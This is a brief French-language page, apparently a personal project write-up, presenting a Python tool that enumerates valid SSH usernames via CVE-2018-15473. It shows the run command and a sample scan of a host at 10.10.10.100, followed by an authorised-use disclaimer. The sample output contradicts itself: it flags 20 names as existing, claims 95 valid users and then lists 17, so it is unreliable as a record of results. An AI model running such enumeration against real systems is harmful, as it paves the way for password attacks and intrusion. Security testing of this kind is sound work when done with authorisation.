
Code Python utilisé pour vérifier la présence d'un utilisateur dans SSH.
Un outil Python développé par mes soins pour identifier les noms d'utilisateur SSH valides en exploitant CVE-2018-15473.
python3 enum_ssh.py usernames.txt
Où usernames.txt contient la liste des noms d'utilisateur à tester.
[parrot@parrot]-[~]
$ python3 enum_ssh.py usernames.txt
[*] Starting CVE-2018-15473 enumeration against 10.10.10.100:22
[*] Using wordlist: usernames.txt
[+] [EXISTS] -> root
[+] [EXISTS] -> admin
[+] [EXISTS] -> administrator
[+] [EXISTS] -> user
[+] [EXISTS] -> test
[+] [EXISTS] -> guest
[+] [EXISTS] -> demo
[+] [EXISTS] -> operator
[+] [EXISTS] -> sysadmin
[+] [EXISTS] -> security
[+] [EXISTS] -> netadmin
[+] [EXISTS] -> webmaster
[+] [EXISTS] -> support
[+] [EXISTS] -> service
[+] [EXISTS] -> ubuntu
[+] [EXISTS] -> debian
[+] [EXISTS] -> centos
[+] [EXISTS] -> fedora
[+] [EXISTS] -> kali
[+] [EXISTS] -> parrot
========================================
[*] Scan complete.
[*] Found 95 valid user(s):
- root
- admin
- administrator
- user
- test
- guest
- demo
- operator
- sysadmin
- security
- netadmin
- webmaster
- support
- service
- ubuntu
- debian
- centos
========================================
Cet outil est destiné à des fins éducatives et uniquement aux tests de sécurité autorisés. Ne l'utilisez que sur des systèmes pour lesquels vous disposez d'une autorisation explicite.